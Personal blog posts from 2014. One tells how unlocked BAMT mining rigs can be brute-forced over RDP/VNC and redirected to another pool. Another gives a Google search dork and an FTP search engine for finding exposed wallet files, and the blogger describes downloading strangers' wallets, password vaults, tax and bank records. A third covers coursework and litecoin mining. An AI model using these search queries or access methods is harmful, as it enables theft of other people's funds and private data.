I have all the time in the world to beat the RDP or VNC services and the system will never lock me out.



Now, why would I even bother? There is big money in mining, especially if you found someone running a big mining system, and also because once I get into BAMT's console, I can redirect it to mine to my account at another pool. Most people who use BAMT do not actually monitor it, as the system is designed to be more automated and "secure". What would eventually happen is people notice they aren't getting paid, check their miner, notice that the pool/user/pass has been changed, and probably are very confused, as it's Linux and it's supposed to be secure.

What can be done about this? Two things: not putting it on a publicly facing IP (you can wait to get home to check your mining, people, geez), and also restricting RDP to accept connections only from one or two computers, like your home and work computer.

Jan 20, 2014

Dangers of Public Facing “Private” ftp servers

In today's age of the internet, nothing is truly private. Crawlers search the internet and catalog everything. And oh boy do I mean everything.
Out of curiosity one day, I decided to use the Google search engine to amuse myself. My initial thought was about bitcoins, as I am gung-ho for it, and I mine litecoins and dogecoins myself.
Here is my below query:

Wallet filetype:dat site:dropbox.com
Results:



Wow, look at those people who weren't very bright. So after some magic conversions, I managed to open just one of those bitcoin wallets, and here is what I saw:



Now I am getting excited and I want to see how far this rabbit hole goes. I started thinking about what would be a great place to store my backups, and I started thinking FTP servers would be great.
Googling FTP search engines led me to http://filemare.com which appeared to be a great search engine.
Searching for the same file context as with Google, I was able to find a few wallets of various coins; however, this time people had file permissions of 0600 set on them, so no dice in downloading them. Good on them.
But where else does this rabbit hole go? I noticed that various other files came up that matched the string "wallet". What did I find? Something called "eWallet" that links to the software at http://www.iliumsoft.com/ewallet
I found hundreds of these from a good ten to twenty people who have backed up their password storage for websites and credit cards. I was shocked that people would do this. I downloaded one of these files and proceeded to open it up with the software. Password encrypted, good on the company. Research into the software revealed that versions older than 7.1 used MD5 and with a simple hexdump command you can pull out the hash. I attempted to do it but was unsuccessful, more than likely because I am on my Windows laptop and my hexdump tool is poor at best. Either that or I just suck. However, I was able to see categories inside these dumps, for example:



So where else does this go? Outlook pst files are publicly available. A quick download and opened with a read-only PST viewer:



Or how about this? A private KeePass key


How about shipping orders for flowers?



Paypal transaction histories?


Are you kidding me???? This guy has his social security number, address, income and more listed in just one public facing tax document?


T-mobile account, phone number(s) and payment information:






Bank account info:



I even found a website, they backed up their entire sql database as their website is currently down:




How about an entire phone's CWM backup?




This is crazy! I cannot believe what I found. Why would people allow this type of information to be posted?

The answer: lack of education.  Total for the day: 12 people’s lives could have been ruined by me. I’m not even sure if I should contact these people. Embarrassment can cause people to lash out. I've blurred the screenshots as best as possible, and all my research files are being deleted. My favorite find today? 
ftp://xxxxxx.xxxxx.xxxx/Username/Backup/Dropbox/Private



Jan 7, 2014

Don't care for your boss

Completed RIT1 last week, which is one of the leadership classes; the official title is "Leadership Concepts and Application". I spent the entire week and a half sobbing and crying as I worked my way through it. Why, do you ask? Because it was dry, boring, and uninteresting to me. I do not particularly care for HR stuff, so forcing myself through that course was painstaking. I quickly read the chapters and did my Taskstream essays. There were four of them and each got sent back to me two to three times to be re-written. It was very frustrating.
What was particularly frustrating was the TurnItIn plagiarism check software they had built in. This scans your paper, compares it to others and decides if you stole others' ideas. Great in theory but bad in practice. I completely understand the need for this software, but the problem was that WGU would not accept the paper if it exceeded 30% on the originality report. Well....we use quotes in our papers and so those "count" against you. I would submit my paper, wait for the report to come back and see if it was above that mark, and if it was, I would cancel the paper and resubmit after rewording stuff. Because of the rewording, I wasn't always pleased with the way I had to write or paraphrase things. It became quite frustrating but heh....got the dang class passed.


So what's next, since I am technically done with my first semester at WGU? Why, onto the next class, do not stop! Now doing CQV1, which is the CCNA class. Awesome! My student-mentor let me move into this class so that the knowledge from my CCENT would still be in my head. So far I'm listening to/watching the first four videos, which are review videos, hence my not paying too much attention and writing this blog.

In other news, still trying to set up my litecoin mining rigs. I bought yet another video card, but the x4 PCI-E slot on my mobo is busted. I have plenty of money coming in on PayPal, but it won't be available till the 22nd of January. Then I'll buy a riser cable to use my x1 slot for that new card. Currently hashing at 430KH/s, which isn't that great. Generating about point one five coins a day, which is not enough. If I can get this new card in, it will boost me to 750-800KH/s, which should put me at point two five coins a day. I tried to convince the wife to let me use some of our savings to build a dedicated machine, but she said no. Dang.